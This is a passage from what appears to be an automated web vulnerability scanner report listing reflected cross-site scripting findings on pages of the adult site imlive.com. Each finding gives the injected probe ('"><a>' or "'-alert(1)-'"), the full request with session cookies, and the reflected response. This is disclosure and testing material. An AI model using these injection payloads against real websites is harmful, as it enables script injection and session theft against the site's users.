GET /live-sex-chats/?66ff1"><a>7cdd9e5718=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:23:44 GMT Connection: close Content-Length: 40363 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/?66ff1"><a>7cdd9e5718=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.66. http://imlive.com/live-sex-chats/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d227'-alert(1)-'63744927c3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/?6d227'-alert(1)-'63744927c3a=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:01 GMT Connection: close Content-Length: 40531 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category.aspx&he=imlive.com&ul=/live-sex-chats/?6d227'-alert(1)-'63744927c3a=1&qs=cat=1&qs=cat=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEve ...[SNIP]...
2.67. http://imlive.com/live-sex-chats/adult-shows/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/adult-shows/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb3b0"><a>47d9b6a6eb1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/adult-shows/?bb3b0"><a>47d9b6a6eb1=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:35 GMT Connection: close Content-Length: 25631 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/adult-shows/?bb3b0"><a>47d9b6a6eb1=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.68. http://imlive.com/live-sex-chats/adult-shows/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/adult-shows/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 52a1f'-alert(1)-'124e919064e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/adult-shows/?52a1f'-alert(1)-'124e919064e=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:40 GMT Connection: close Content-Length: 25778 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/bt/btguest.aspx&he=imlive.com&ul=/live-sex-chats/adult-shows/?52a1f'-alert(1)-'124e919064e=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ...[SNIP]...
2.69. http://imlive.com/live-sex-chats/cam-girls/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/cam-girls/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d76ad"><a>13636193c19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/cam-girls/?d76ad"><a>13636193c19=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:20:35 GMT Connection: close Content-Length: 226523 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a href="/live-sex-chats/cam-girls/?d76ad"><a>13636193c19=1"> ...[SNIP]...
2.70. http://imlive.com/live-sex-chats/cam-girls/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/cam-girls/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d13a5'-alert(1)-'167550feeda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/cam-girls/?d13a5'-alert(1)-'167550feeda=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:21:10 GMT Connection: close Content-Length: 225335 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/cam-girls/?d13a5'-alert(1)-'167550feeda=1&qs=cat=1^roomid=10^d13a5'-alert(1)-'167550feeda=1&qs=cat=1^roomid=10^d13a5'-alert(1)-'167550feeda=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb ...[SNIP]...
2.71. http://imlive.com/live-sex-chats/cam-girls/categories/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/cam-girls/categories/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60b83"><a>3293a7e18ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/cam-girls/categories/?60b83"><a>3293a7e18ef=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:10 GMT Connection: close Content-Length: 27644 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/cam-girls/categories/?60b83"><a>3293a7e18ef=1');return false;" lang="en-US" hreflang="en-US"> ...[SNIP]...
2.72. http://imlive.com/live-sex-chats/cam-girls/categories/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://imlive.com
Path: /live-sex-chats/cam-girls/categories/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 145d0'-alert(1)-'7c612653421 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/cam-girls/categories/?145d0'-alert(1)-'7c612653421=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:19:19 GMT Connection: close Content-Length: 27791 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... <script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/category_sub.aspx&he=imlive.com&ul=/live-sex-chats/cam-girls/categories/?145d0'-alert(1)-'7c612653421=1&qs=roomid=10&qs=roomid=10&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.a ...[SNIP]...
2.73. http://imlive.com/live-sex-chats/cams-aroundthehouse/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Firm
Host: http://imlive.com
Path: /live-sex-chats/cams-aroundthehouse/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41f55"><a>53aa4db76a1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /live-sex-chats/cams-aroundthehouse/?41f55"><a>53aa4db76a1=1 HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Response
